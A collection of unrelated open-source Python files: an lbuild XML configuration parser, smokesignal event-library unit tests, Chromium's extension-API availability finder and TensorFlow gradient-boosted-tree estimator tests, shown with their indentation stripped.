def fill_form_from_job(job, form):
form.warnings = iterate_over_form(job, form, get_data)
## This logic if used in several functions where ?clone=<job_id> may
## be added to the url. If ?clone=<job_id> is specified in the url,
## fill the form with that job.
def fill_form_if_cloned(form):
## is there a request to clone a job.
from digits.webapp import scheduler
clone = get_request_arg('clone')
if clone is not None:
clone_job = scheduler.get_job(clone)
fill_form_from_job(clone_job, form)
| |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright (c) 2015-2018, Fabian Greif
# All Rights Reserved.
#
# The file is part of the lbuild project and is released under the
# 2-clause BSD license. See the file `LICENSE.txt` for the full license
# governing this code.
import os
import pkgutil
import logging
import collections
import lxml.etree
from .exception import BlobException
import lbuild.module
LOGGER = logging.getLogger('lbuild.config')
DEFAULT_CACHE_FOLDER = ".lbuild_cache"
class Option:
"""
Option in the configuration file.
"""
def __init__(self, name, value):
"""
Construct a new option.
Args:
name: Option name. Can be not fully qualified.
value: Value of the option.
"""
self.name = name
self.value = value
def __eq__(self, other):
return (self.name == other.name and self.value == other.value)
def __lt__(self, other):
return self.name < other.name
def __repr__(self):
return "<Option: {}={}>".format(self.name, self.value)
class Configuration:
def __init__(self):
self.filename = ""
# Path to the configuration file. Use to resolve relative paths.
self.configpath = ""
self.options = []
self.selected_modules = []
self.repositories = []
self.cachefolder = None
self.vcs = []
@staticmethod
def load_and_verify(configfile):
"""
Verify the XML structure.
"""
try:
LOGGER.debug("Parse configuration '%s'", configfile)
xmlroot = lxml.etree.parse(configfile)
xmlschema = lxml.etree.fromstring(pkgutil.get_data('lbuild', 'resources/configuration.xsd'))
schema = lxml.etree.XMLSchema(xmlschema)
schema.assertValid(xmlroot)
xmltree = xmlroot.getroot()
except OSError as error:
raise BlobException(error)
except (lxml.etree.DocumentInvalid,
lxml.etree.XMLSyntaxError,
lxml.etree.XMLSchemaParseError,
lxml.etree.XIncludeError) as error:
raise BlobException("While parsing '{}':"
" {}".format(error.error_log.last_error.filename,
error))
return xmltree
@staticmethod
def parse_configuration(configfile, childconfig=None):
"""
Parse the configuration file.
This file contains information about which modules should be included
and how they are configured.
Returns:
Populated Configuration object.
"""
if childconfig is None:
childconfig = Configuration()
xmltree = Configuration.load_and_verify(configfile)
configpath = os.path.dirname(configfile)
for basenode in xmltree.iterfind("extends"):
basefile = Configuration.__get_path(basenode.text, configpath)
Configuration.parse_configuration(basefile, childconfig)
configuration = childconfig
configuration.filename = configfile
configuration.configpath = configpath
# Load cachefolder
cache_node = xmltree.find("repositories/cache")
if cache_node is not None:
cachefolder = Configuration.__get_path(cache_node.text, configuration.configpath)
else:
default = DEFAULT_CACHE_FOLDER if configuration.cachefolder is None else configuration.cachefolder
cachefolder = os.path.join(configuration.configpath, default)
configuration.cachefolder = cachefolder
# Load version control nodes
for vcs_node in xmltree.iterfind("repositories/repository/vcs"):
for vcs in vcs_node.iterchildren():
vcs_config = Configuration.to_dict(vcs)
configuration.vcs.append(vcs_config)
# Load repositories
for path_node in xmltree.iterfind("repositories/repository/path"):
repository_path = path_node.text.format(cache=cachefolder)
repository_filename = os.path.realpath(os.path.join(configuration.configpath,
repository_path))
if repository_filename not in configuration.repositories:
configuration.repositories.append(repository_filename)
# Load all requested modules
for modules_node in xmltree.findall('modules'):
for module_node in modules_node.findall('module'):
modulename = module_node.text
lbuild.module.verify_module_name(modulename)
LOGGER.debug("- require module '%s'", modulename)
if modulename not in configuration.selected_modules:
configuration.selected_modules.append(modulename)
# Load options
for option_node in xmltree.find('options').findall('option'):
name = option_node.attrib['name']
try:
value = option_node.attrib['value']
except KeyError:
value = option_node.text
for index, option in enumerate(configuration.options):
if option.name == name:
del configuration.options[index]
configuration.options.append(Option(name=name, value=value))
return configuration
@staticmethod
def __get_path(path, configpath):
if os.path.isabs(path):
return path
else:
return os.path.join(configpath, path)
@staticmethod
def format_commandline_options(cmd_options):
cmd = []
for option in cmd_options:
parts = option.split('=')
cmd.append(Option(name=parts[0], value=parts[1]))
return cmd
@staticmethod
def to_dict(xmltree):
"""
Convert XML to a Python dictionary according to
http://www.xml.com/pub/a/2006/05/31/converting-between-xml-and-json.html
"""
d = {xmltree.tag: {} if xmltree.attrib else None}
children = []
for c in xmltree:
children.append(c)
if children:
dd = collections.defaultdict(list)
for dc in [Configuration.to_dict(c) for c in children]:
for k, v in dc.items():
dd[k].append(v)
d = {xmltree.tag: {k:v[0] if len(v) == 1 else v for k, v in dd.items()}}
if xmltree.attrib:
d[xmltree.tag].update(('@' + k, v) for k, v in xmltree.attrib.items())
if xmltree.text:
text = xmltree.text.strip()
if children or xmltree.attrib:
if text:
d[xmltree.tag]['#text'] = text
else:
d[xmltree.tag] = text
return d
| |
""" Unit tests """
import types
from collections import defaultdict
import pytest
from mock import Mock, call, patch
import smokesignal
if smokesignal._twisted_support:
from tests_twisted import TestTwisted
class TestSmokesignal(object):
def setup(self):
self.fn = Mock(spec=types.FunctionType)
patch.object(smokesignal, 'receivers', defaultdict(set)).start()
def teardown(self):
patch.stopall()
def test_call_no_max_calls(self):
for x in range(5):
smokesignal._call(self.fn)
assert self.fn.call_count == 5
def test_call_with_max_calls(self):
self.fn._max_calls = 1
for x in range(5):
smokesignal._call(self.fn)
assert self.fn.call_count == 1
def test_clear(self):
smokesignal.on('foo', self.fn)
assert smokesignal.receivers['foo'] == set([self.fn])
smokesignal.clear('foo')
assert smokesignal.receivers['foo'] == set()
def test_clear_no_args_clears_all(self):
smokesignal.on(('foo', 'bar', 'baz'), self.fn)
assert smokesignal.receivers == {
'foo': set([self.fn]),
'bar': set([self.fn]),
'baz': set([self.fn]),
}
smokesignal.clear()
assert smokesignal.receivers == {
'foo': set(),
'bar': set(),
'baz': set(),
}
def test_clear_many(self):
smokesignal.on(('foo', 'bar', 'baz'), self.fn)
smokesignal.clear('foo', 'bar')
assert smokesignal.receivers == {
'foo': set(),
'bar': set(),
'baz': set([self.fn]),
}
def test_clear_all(self):
smokesignal.on(('foo', 'bar'), self.fn)
assert smokesignal.receivers == {
'foo': set([self.fn]),
'bar': set([self.fn]),
}
smokesignal.clear_all()
assert smokesignal.receivers == {
'foo': set(),
'bar': set(),
}
def test_emit_with_no_callbacks(self):
try:
smokesignal.emit('foo')
except:
pytest.fail('Emitting a signal with no callback should not have raised')
def test_emit_with_callbacks(self):
# Register first
smokesignal.on('foo', self.fn)
smokesignal.emit('foo')
assert self.fn.called
def test_emit_with_callback_args(self):
# Register first
smokesignal.on('foo', self.fn)
smokesignal.emit('foo', 1, 2, 3, foo='bar')
self.fn.assert_called_with(1, 2, 3, foo='bar')
def test_on_must_have_callables(self):
with pytest.raises(AssertionError):
smokesignal.on('foo', 'bar')
def test_on_registers(self):
smokesignal.on('foo', self.fn)
assert smokesignal.receivers['foo'] == set([self.fn])
def test_on_registers_many(self):
assert smokesignal.receivers == {}
smokesignal.on(('foo', 'bar'), self.fn)
assert smokesignal.receivers == {
'foo': set([self.fn]),
'bar': set([self.fn]),
}
def test_on_max_calls(self):
# Register first
smokesignal.on('foo', self.fn, max_calls=3)
# Call a bunch of times
for x in range(10):
smokesignal.emit('foo')
assert self.fn.call_count == 3
assert smokesignal.receivers['foo'] == set()
def test_on_decorator_registers(self):
@smokesignal.on('foo')
def my_callback():
pass
assert smokesignal.receivers['foo'] == set([my_callback])
def test_on_decorator_registers_many(self):
@smokesignal.on(('foo', 'bar'))
def my_callback():
pass
assert smokesignal.receivers == {
'foo': set([my_callback]),
'bar': set([my_callback]),
}
def test_on_decorator_max_calls(self):
# Register first - like a decorator
smokesignal.on('foo', max_calls=3)(self.fn)
# Call a bunch of times
for x in range(10):
smokesignal.emit('foo')
assert self.fn.call_count == 3
def test_on_decorator_max_calls_as_arg(self):
# Register first - like a decorator
smokesignal.on('foo', 3)(self.fn)
# Call a bunch of times
for x in range(10):
smokesignal.emit('foo')
assert self.fn.call_count == 3
def test_disconnect(self):
# Register first
smokesignal.on(('foo', 'bar'), self.fn)
assert smokesignal.responds_to(self.fn, 'foo')
assert smokesignal.responds_to(self.fn, 'bar')
smokesignal.disconnect(self.fn)
assert not smokesignal.responds_to(self.fn, 'foo')
assert not smokesignal.responds_to(self.fn, 'bar')
def test_disconnect_from_removes_only_one(self):
# Register first
smokesignal.on(('foo', 'bar'), self.fn)
assert smokesignal.responds_to(self.fn, 'foo')
assert smokesignal.responds_to(self.fn, 'bar')
# Remove it
smokesignal.disconnect_from(self.fn, 'foo')
assert not smokesignal.responds_to(self.fn, 'foo')
assert smokesignal.responds_to(self.fn, 'bar')
def test_disconnect_from_removes_all(self):
# Register first
smokesignal.on(('foo', 'bar'), self.fn)
assert smokesignal.responds_to(self.fn, 'foo')
assert smokesignal.responds_to(self.fn, 'bar')
# Remove it
smokesignal.disconnect_from(self.fn, ('foo', 'bar'))
assert not smokesignal.responds_to(self.fn, 'foo')
assert not smokesignal.responds_to(self.fn, 'bar')
def test_signals(self):
# Register first
smokesignal.on(('foo', 'bar'), self.fn)
assert 'foo' in smokesignal.signals(self.fn)
assert 'bar' in smokesignal.signals(self.fn)
def test_responds_to_true(self):
# Register first
smokesignal.on('foo', self.fn)
assert smokesignal.responds_to(self.fn, 'foo') is True
def test_responds_to_false(self):
# Register first
smokesignal.on('foo', self.fn)
assert smokesignal.responds_to(self.fn, 'bar') is False
def test_once_raises(self):
with pytest.raises(AssertionError):
smokesignal.once('foo', 'bar')
def test_once(self):
# Register and call twice
smokesignal.once('foo', self.fn)
smokesignal.emit('foo')
smokesignal.emit('foo')
assert self.fn.call_count == 1
assert smokesignal.receivers['foo'] == set()
def test_once_decorator(self):
# Register and call twice
smokesignal.once('foo')(self.fn)
smokesignal.emit('foo')
smokesignal.emit('foo')
assert self.fn.call_count == 1
@patch('smokesignal.emit')
def test_emitting_arg_style(self, emit):
with smokesignal.emitting('foo'):
pass
emit.assert_called_with('foo')
@patch('smokesignal.emit')
def test_emitting_kwarg_style(self, emit):
with smokesignal.emitting(enter='foo', exit='bar'):
pass
emit.assert_has_calls([call('foo'), call('bar')])
def test_on_creates_responds_to_fn(self):
# Registering a callback should create partials to smokesignal
# methods for later user
smokesignal.on('foo', self.fn)
assert hasattr(self.fn, 'responds_to')
assert self.fn.responds_to('foo')
def test_on_creates_signals_fn(self):
# Registering a callback should create partials to smokesignal
# methods for later user
smokesignal.on(('foo', 'bar'), self.fn)
assert hasattr(self.fn, 'signals')
assert 'foo' in self.fn.signals()
assert 'bar' in self.fn.signals()
def test_on_creates_disconnect_fn(self):
smokesignal.on(('foo', 'bar'), self.fn)
assert hasattr(self.fn, 'disconnect')
self.fn.disconnect()
assert self.fn.signals() == tuple()
def test_on_creates_disconnect_from_fn(self):
smokesignal.on(('foo', 'bar'), self.fn)
assert hasattr(self.fn, 'disconnect_from')
self.fn.disconnect_from('foo')
assert self.fn.signals() == ('bar',)
def test_instance_method(self):
class Foo(object):
def __init__(self):
# Preferred way
smokesignal.on('foo', self.foo)
# Old way
@smokesignal.on('foo')
def _bar():
self.bar()
self.foo_count = 0
self.bar_count = 0
def foo(self):
self.foo_count += 1
def bar(self):
self.bar_count += 1
foo = Foo()
smokesignal.emit('foo')
smokesignal.emit('bar')
assert foo.foo_count == 1
assert foo.bar_count == 1
def test_instance_method_passes_args_kwargs(self):
class Foo(object):
def __init__(self):
smokesignal.on('foo', self.foo)
self.foo_count = 0
def foo(self, n, mult=1):
self.foo_count += (n * mult)
foo = Foo()
smokesignal.emit('foo', 5, mult=6)
assert foo.foo_count == 30
def test_instance_method_max_calls(self):
class Foo(object):
def __init__(self):
smokesignal.once('foo', self.foo)
self.foo_count = 0
def foo(self):
self.foo_count += 1
foo = Foo()
for x in range(5):
smokesignal.emit('foo')
assert foo.foo_count == 1
| |
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from collections import Mapping
import posixpath
from api_schema_graph import APISchemaGraph
from branch_utility import BranchUtility
from extensions_paths import API, JSON_TEMPLATES
from third_party.json_schema_compiler.model import UnixName
_EXTENSION_API = 'extension_api.json'
# The version where api_features.json is first available.
_API_FEATURES_MIN_VERSION = 28
# The version where permission_ and manifest_features.json are available and
# presented in the current format.
_ORIGINAL_FEATURES_MIN_VERSION = 20
# API schemas are aggregated in extension_api.json up to this version.
_EXTENSION_API_MAX_VERSION = 17
# The earliest version for which we have SVN data.
_SVN_MIN_VERSION = 5
def _GetChannelFromFeatures(api_name, json_fs, filename):
'''Finds API channel information from the features |filename| within the the
given |json_fs|. Returns None if channel information for the API cannot be
located.
'''
feature = json_fs.GetFromFile(API + filename).Get().get(api_name)
if feature is None:
return None
if isinstance(feature, Mapping):
# The channel information exists as a solitary dict.
return feature.get('channel')
# The channel information dict is nested within a list for whitelisting
# purposes. Take the newest channel out of all of the entries.
return BranchUtility.NewestChannel(entry.get('channel') for entry in feature)
def _GetChannelFromApiFeatures(api_name, json_fs):
return _GetChannelFromFeatures(api_name, json_fs, '_api_features.json')
def _GetChannelFromManifestFeatures(api_name, json_fs):
# _manifest_features.json uses unix_style API names.
api_name = UnixName(api_name)
return _GetChannelFromFeatures(api_name, json_fs, '_manifest_features.json')
def _GetChannelFromPermissionFeatures(api_name, json_fs):
return _GetChannelFromFeatures(api_name, json_fs, '_permission_features.json')
class AvailabilityFinder(object):
'''Generates availability information for APIs by looking at API schemas and
_features files over multiple release versions of Chrome.
'''
def __init__(self,
branch_utility,
compiled_fs_factory,
file_system_iterator,
host_file_system,
object_store_creator):
self._branch_utility = branch_utility
self._compiled_fs_factory = compiled_fs_factory
self._file_system_iterator = file_system_iterator
self._host_file_system = host_file_system
self._object_store_creator = object_store_creator
def create_object_store(category):
return object_store_creator.Create(AvailabilityFinder, category=category)
self._top_level_object_store = create_object_store('top_level')
self._node_level_object_store = create_object_store('node_level')
self._json_fs = compiled_fs_factory.ForJson(self._host_file_system)
def _GetPredeterminedAvailability(self, api_name):
'''Checks a configuration file for hardcoded (i.e. predetermined)
availability information for an API.
'''
api_info = self._json_fs.GetFromFile(
JSON_TEMPLATES + 'api_availabilities.json').Get().get(api_name)
if api_info is None:
return None
if api_info['channel'] == 'stable':
return self._branch_utility.GetStableChannelInfo(api_info['version'])
else:
return self._branch_utility.GetChannelInfo(api_info['channel'])
def _GetApiSchemaFilename(self, api_name, file_system, version):
'''Gets the name of the file which may contain the schema for |api_name| in
|file_system|, or None if the API is not found. Note that this may be the
single _EXTENSION_API file which all APIs share in older versions of Chrome,
in which case it is unknown whether the API actually exists there.
'''
def under_api_path(path):
return API + path
if version == 'trunk' or version > _ORIGINAL_FEATURES_MIN_VERSION:
# API schema filenames switch format to unix_hacker_style.
api_name = UnixName(api_name)
# |file_system| will cache the results from the ReadSingle() call.
filenames = file_system.ReadSingle(API).Get()
for ext in ('json', 'idl'):
filename = '%s.%s' % (api_name, ext)
if filename in filenames:
return under_api_path(filename)
if _EXTENSION_API in filenames:
return under_api_path(_EXTENSION_API)
# API schema data could not be found in any .json or .idl file.
return None
def _GetApiSchema(self, api_name, file_system, version):
'''Searches |file_system| for |api_name|'s API schema data, and processes
and returns it if found.
'''
api_filename = self._GetApiSchemaFilename(api_name, file_system, version)
if api_filename is None:
# No file for the API could be found in the given |file_system|.
return None
schema_fs = self._compiled_fs_factory.ForApiSchema(file_system)
api_schemas = schema_fs.GetFromFile(api_filename).Get()
matching_schemas = [api for api in api_schemas
if api['namespace'] == api_name]
# There should only be a single matching schema per file, or zero in the
# case of no API data being found in _EXTENSION_API.
assert len(matching_schemas) <= 1
return matching_schemas or None
def _HasApiSchema(self, api_name, file_system, version):
'''Whether or not an API schema for |api_name|exists in the given
|file_system|.
'''
filename = self._GetApiSchemaFilename(api_name, file_system, version)
if filename is None:
return False
if filename.endswith(_EXTENSION_API):
return self._GetApiSchema(api_name, file_system, version) is not None
return True
def _CheckStableAvailability(self, api_name, file_system, version):
'''Checks for availability of an API, |api_name|, on the stable channel.
Considers several _features.json files, file system existence, and
extension_api.json depending on the given |version|.
'''
if version < _SVN_MIN_VERSION:
# SVN data isn't available below this version.
return False
available_channel = None
json_fs = self._compiled_fs_factory.ForJson(file_system)
if version >= _API_FEATURES_MIN_VERSION:
# The _api_features.json file first appears in version 28 and should be
# the most reliable for finding API availability.
available_channel = _GetChannelFromApiFeatures(api_name, json_fs)
if version >= _ORIGINAL_FEATURES_MIN_VERSION:
# The _permission_features.json and _manifest_features.json files are
# present in Chrome 20 and onwards. Use these if no information could be
# found using _api_features.json.
available_channel = available_channel or (
_GetChannelFromPermissionFeatures(api_name, json_fs)
or _GetChannelFromManifestFeatures(api_name, json_fs))
if available_channel is not None:
return available_channel == 'stable'
if version >= _SVN_MIN_VERSION:
# Fall back to a check for file system existence if the API is not
# stable in any of the _features.json files, or if the _features files
# do not exist (version 19 and earlier).
return self._HasApiSchema(api_name, file_system, version)
def _CheckChannelAvailability(self, api_name, file_system, channel_info):
'''Searches through the _features files in a given |file_system|, falling
back to checking the file system for API schema existence, to determine
whether or not an API is available on the given channel, |channel_info|.
'''
json_fs = self._compiled_fs_factory.ForJson(file_system)
available_channel = (_GetChannelFromApiFeatures(api_name, json_fs)
or _GetChannelFromPermissionFeatures(api_name, json_fs)
or _GetChannelFromManifestFeatures(api_name, json_fs))
if (available_channel is None and
self._HasApiSchema(api_name, file_system, channel_info.version)):
# If an API is not represented in any of the _features files, but exists
# in the filesystem, then assume it is available in this version.
# The chrome.windows API is an example of this.
available_channel = channel_info.channel
# If the channel we're checking is the same as or newer than the
# |available_channel| then the API is available at this channel.
newest = BranchUtility.NewestChannel((available_channel,
channel_info.channel))
return available_channel is not None and newest == channel_info.channel
def _CheckApiAvailability(self, api_name, file_system, channel_info):
'''Determines the availability for an API at a certain version of Chrome.
Two branches of logic are used depending on whether or not the API is
determined to be 'stable' at the given version.
'''
if channel_info.channel == 'stable':
return self._CheckStableAvailability(api_name,
file_system,
channel_info.version)
return self._CheckChannelAvailability(api_name,
file_system,
channel_info)
def GetApiAvailability(self, api_name):
'''Performs a search for an API's top-level availability by using a
HostFileSystemIterator instance to traverse multiple version of the
SVN filesystem.
'''
availability = self._top_level_object_store.Get(api_name).Get()
if availability is not None:
return availability
# Check for predetermined availability and cache this information if found.
availability = self._GetPredeterminedAvailability(api_name)
if availability is not None:
self._top_level_object_store.Set(api_name, availability)
return availability
def check_api_availability(file_system, channel_info):
return self._CheckApiAvailability(api_name, file_system, channel_info)
availability = self._file_system_iterator.Descending(
self._branch_utility.GetChannelInfo('dev'),
check_api_availability)
if availability is None:
# The API wasn't available on 'dev', so it must be a 'trunk'-only API.
availability = self._branch_utility.GetChannelInfo('trunk')
self._top_level_object_store.Set(api_name, availability)
return availability
def GetApiNodeAvailability(self, api_name):
'''Returns an APISchemaGraph annotated with each node's availability (the
ChannelInfo at the oldest channel it's available in).
'''
availability_graph = self._node_level_object_store.Get(api_name).Get()
if availability_graph is not None:
return availability_graph
def assert_not_none(value):
assert value is not None
return value
availability_graph = APISchemaGraph()
host_fs = self._host_file_system
trunk_stat = assert_not_none(host_fs.Stat(self._GetApiSchemaFilename(
api_name, host_fs, 'trunk')))
# Weird object thing here because nonlocal is Python 3.
previous = type('previous', (object,), {'stat': None, 'graph': None})
def update_availability_graph(file_system, channel_info):
version_filename = assert_not_none(self._GetApiSchemaFilename(
api_name, file_system, channel_info.version))
version_stat = assert_not_none(file_system.Stat(version_filename))
# Important optimisation: only re-parse the graph if the file changed in
# the last revision. Parsing the same schema and forming a graph on every
# iteration is really expensive.
if version_stat == previous.stat:
version_graph = previous.graph
else:
# Keep track of any new schema elements from this version by adding
# them to |availability_graph|.
#
# Calling |availability_graph|.Lookup() on the nodes being updated
# will return the |annotation| object -- the current |channel_info|.
version_graph = APISchemaGraph(self._GetApiSchema(
api_name, file_system, channel_info.version))
availability_graph.Update(version_graph.Subtract(availability_graph),
annotation=channel_info)
previous.stat = version_stat
previous.graph = version_graph
# Continue looping until there are no longer differences between this
# version and trunk.
return version_stat != trunk_stat
self._file_system_iterator.Ascending(self.GetApiAvailability(api_name),
update_availability_graph)
self._node_level_object_store.Set(api_name, availability_graph)
return availability_graph
| |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for GBDT estimator."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tempfile
import numpy as np
from tensorflow.contrib.boosted_trees.estimator_batch import estimator
from tensorflow.contrib.boosted_trees.proto import learner_pb2
from tensorflow.contrib.layers.python.layers import feature_column as contrib_feature_column
from tensorflow.contrib.learn.python.learn.estimators import run_config
from tensorflow.python.estimator.canned import head as head_lib
from tensorflow.python.estimator.inputs import numpy_io
from tensorflow.python.feature_column import feature_column_lib as core_feature_column
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import test_util
from tensorflow.python.ops.losses import losses
from tensorflow.python.platform import gfile
from tensorflow.python.platform import googletest
from tensorflow.python.training import checkpoint_utils
def _train_input_fn():
features = {"x": constant_op.constant([[2.], [1.], [1.]])}
label = constant_op.constant([[1], [0], [0]], dtype=dtypes.int32)
return features, label
def _multiclass_train_input_fn():
features = {
"x": constant_op.constant([[2.], [1.], [1.], [5.], [3.5], [4.6], [3.5]])
}
label = constant_op.constant([[1], [0], [0], [2], [2], [0], [1]],
dtype=dtypes.int32)
return features, label
def _ranking_train_input_fn():
features = {
"a.f1": constant_op.constant([[3.], [0.3], [1.]]),
"a.f2": constant_op.constant([[0.1], [3.], [1.]]),
"b.f1": constant_op.constant([[13.], [0.4], [5.]]),
"b.f2": constant_op.constant([[1.], [3.], [0.01]]),
}
label = constant_op.constant([[0], [0], [1]], dtype=dtypes.int32)
return features, label
def _eval_input_fn():
features = {"x": constant_op.constant([[1.], [2.], [2.]])}
label = constant_op.constant([[0], [1], [1]], dtype=dtypes.int32)
return features, label
def _infer_ranking_train_input_fn():
features = {
"f1": constant_op.constant([[3.], [2], [1.]]),
"f2": constant_op.constant([[0.1], [3.], [1.]])
}
return features, None
_QUANTILE_REGRESSION_SIZE = 1000
def _quantile_regression_input_fns():
# The data generation is taken from
# http://scikit-learn.org/stable/auto_examples/ensemble/plot_gradient_boosting_quantile.html
np.random.seed(1)
def f(x):
"""The function to predict."""
return x * np.sin(x)
# Training data.
x = np.atleast_2d(np.random.uniform(0, 10.0,
size=_QUANTILE_REGRESSION_SIZE)).T
x = x.astype(np.float32)
# Labels.
y = f(x).ravel()
# Add random noise.
dy = 1.5 + 1.0 * np.random.random(y.shape)
noise = np.random.normal(0, dy)
y += noise
y_original = y.astype(np.float32)
y = y.reshape(_QUANTILE_REGRESSION_SIZE, 1)
train_input_fn = numpy_io.numpy_input_fn(
x=x,
y=y,
batch_size=_QUANTILE_REGRESSION_SIZE,
num_epochs=None,
shuffle=True)
# Test on the training data to make sure the predictions are calibrated.
test_input_fn = numpy_io.numpy_input_fn(
x=x,
y=y,
batch_size=_QUANTILE_REGRESSION_SIZE,
num_epochs=1,
shuffle=False)
return train_input_fn, test_input_fn, y_original
class BoostedTreeEstimatorTest(test_util.TensorFlowTestCase):
def setUp(self):
self._export_dir_base = tempfile.mkdtemp() + "export/"
gfile.MkDir(self._export_dir_base)
def _assert_checkpoint(self, model_dir, global_step):
reader = checkpoint_utils.load_checkpoint(model_dir)
self.assertEqual(global_step, reader.get_tensor(ops.GraphKeys.GLOBAL_STEP))
def testFitAndEvaluateDontThrowException(self):
learner_config = learner_pb2.LearnerConfig()
learner_config.num_classes = 2
learner_config.constraints.max_tree_depth = 1
model_dir = tempfile.mkdtemp()
config = run_config.RunConfig()
classifier = estimator.GradientBoostedDecisionTreeClassifier(
learner_config=learner_config,
num_trees=1,
examples_per_layer=3,
model_dir=model_dir,
config=config,
feature_columns=[contrib_feature_column.real_valued_column("x")])
classifier.fit(input_fn=_train_input_fn, steps=15)
classifier.evaluate(input_fn=_eval_input_fn, steps=1)
classifier.export(self._export_dir_base)
def testThatLeafIndexIsInPredictions(self):
learner_config = learner_pb2.LearnerConfig()
learner_config.num_classes = 2
learner_config.constraints.max_tree_depth = 1
model_dir = tempfile.mkdtemp()
config = run_config.RunConfig()
classifier = estimator.GradientBoostedDecisionTreeClassifier(
learner_config=learner_config,
num_trees=1,
examples_per_layer=3,
model_dir=model_dir,
config=config,
feature_columns=[contrib_feature_column.real_valued_column("x")],
output_leaf_index=True)
classifier.fit(input_fn=_train_input_fn, steps=15)
result_iter = classifier.predict(input_fn=_eval_input_fn)
for prediction_dict in result_iter:
self.assertTrue("leaf_index" in prediction_dict)
self.assertTrue("logits" in prediction_dict)
def testFitAndEvaluateDontThrowExceptionWithCoreForEstimator(self):
learner_config = learner_pb2.LearnerConfig()
learner_config.num_classes = 2
learner_config.constraints.max_tree_depth = 1
model_dir = tempfile.mkdtemp()
config = run_config.RunConfig()
# Use core head
head_fn = head_lib._binary_logistic_head_with_sigmoid_cross_entropy_loss(
loss_reduction=losses.Reduction.SUM_OVER_BATCH_SIZE)
model = estimator.GradientBoostedDecisionTreeEstimator(
head=head_fn,
learner_config=learner_config,
num_trees=1,
examples_per_layer=3,
model_dir=model_dir,
config=config,
feature_columns=[core_feature_column.numeric_column("x")],
use_core_libs=True)
model.fit(input_fn=_train_input_fn, steps=15)
model.evaluate(input_fn=_eval_input_fn, steps=1)
model.export(self._export_dir_base)
def testFitAndEvaluateDontThrowExceptionWithCoreForClassifier(self):
learner_config = learner_pb2.LearnerConfig()
learner_config.num_classes = 2
learner_config.constraints.max_tree_depth = 1
model_dir = tempfile.mkdtemp()
config = run_config.RunConfig()
classifier = estimator.GradientBoostedDecisionTreeClassifier(
learner_config=learner_config,
num_trees=1,
examples_per_layer=3,
model_dir=model_dir,
config=config,
feature_columns=[core_feature_column.numeric_column("x")],
use_core_libs=True)
classifier.fit(input_fn=_train_input_fn, steps=15)
classifier.evaluate(input_fn=_eval_input_fn, steps=1)
classifier.export(self._export_dir_base)
def testFitAndEvaluateDontThrowExceptionWithCoreForRegressor(self):
learner_config = learner_pb2.LearnerConfig()
learner_config.num_classes = 2
learner_config.constraints.max_tree_depth = 1
model_dir = tempfile.mkdtemp()
config = run_config.RunConfig()
regressor = estimator.GradientBoostedDecisionTreeRegressor(
learner_config=learner_config,
num_trees=1,
examples_per_layer=3,
model_dir=model_dir,
config=config,
feature_columns=[core_feature_column.numeric_column("x")],
use_core_libs=True)
regressor.fit(input_fn=_train_input_fn, steps=15)
regressor.evaluate(input_fn=_eval_input_fn, steps=1)
regressor.export(self._export_dir_base)
def testRankingDontThrowExceptionForForEstimator(self):
learner_config = learner_pb2.LearnerConfig()
learner_config.num_classes = 2
learner_config.constraints.max_tree_depth = 1
model_dir = tempfile.mkdtemp()
config = run_config.RunConfig()
head_fn = head_lib._binary_logistic_head_with_sigmoid_cross_entropy_loss(
loss_reduction=losses.Reduction.SUM_OVER_NONZERO_WEIGHTS)
model = estimator.GradientBoostedDecisionTreeRanker(
head=head_fn,
learner_config=learner_config,
num_trees=1,
examples_per_layer=3,
model_dir=model_dir,
config=config,
use_core_libs=True,
feature_columns=[
core_feature_column.numeric_column("f1"),
core_feature_column.numeric_column("f2")
],
ranking_model_pair_keys=("a", "b"))
model.fit(input_fn=_ranking_train_input_fn, steps=1000)
model.evaluate(input_fn=_ranking_train_input_fn, steps=1)
model.predict(input_fn=_infer_ranking_train_input_fn)
def testDoesNotOverrideGlobalSteps(self):
learner_config = learner_pb2.LearnerConfig()
learner_config.num_classes = 2
learner_config.constraints.max_tree_depth = 2
model_dir = tempfile.mkdtemp()
config = run_config.RunConfig()
classifier = estimator.GradientBoostedDecisionTreeClassifier(
learner_config=learner_config,
num_trees=1,
examples_per_layer=3,
model_dir=model_dir,
config=config,
feature_columns=[contrib_feature_column.real_valued_column("x")],
output_leaf_index=False)
classifier.fit(input_fn=_train_input_fn, steps=15)
# When no override of global steps, 5 steps were used.
self._assert_checkpoint(classifier.model_dir, global_step=5)
def testOverridesGlobalSteps(self):
learner_config = learner_pb2.LearnerConfig()
learner_config.num_classes = 2
learner_config.constraints.max_tree_depth = 2
model_dir = tempfile.mkdtemp()
config = run_config.RunConfig()
classifier = estimator.GradientBoostedDecisionTreeClassifier(
learner_config=learner_config,
num_trees=1,
examples_per_layer=3,
model_dir=model_dir,
config=config,
feature_columns=[contrib_feature_column.real_valued_column("x")],
output_leaf_index=False,
override_global_step_value=10000000)
classifier.fit(input_fn=_train_input_fn, steps=15)
self._assert_checkpoint(classifier.model_dir, global_step=10000000)
def testFitAndEvaluateMultiClassTreePerClassDontThrowException(self):
learner_config = learner_pb2.LearnerConfig()
learner_config.num_classes = 3
learner_config.constraints.max_tree_depth = 1
learner_config.multi_class_strategy = (
learner_pb2.LearnerConfig.TREE_PER_CLASS)
model_dir = tempfile.mkdtemp()
config = run_config.RunConfig()
classifier = estimator.GradientBoostedDecisionTreeClassifier(
learner_config=learner_config,
n_classes=learner_config.num_classes,
num_trees=1,
examples_per_layer=7,
model_dir=model_dir,
config=config,
feature_columns=[contrib_feature_column.real_valued_column("x")])
classifier.fit(input_fn=_multiclass_train_input_fn, steps=100)
classifier.evaluate(input_fn=_eval_input_fn, steps=1)
classifier.export(self._export_dir_base)
result_iter = classifier.predict(input_fn=_eval_input_fn)
for prediction_dict in result_iter:
self.assertTrue("classes" in prediction_dict)
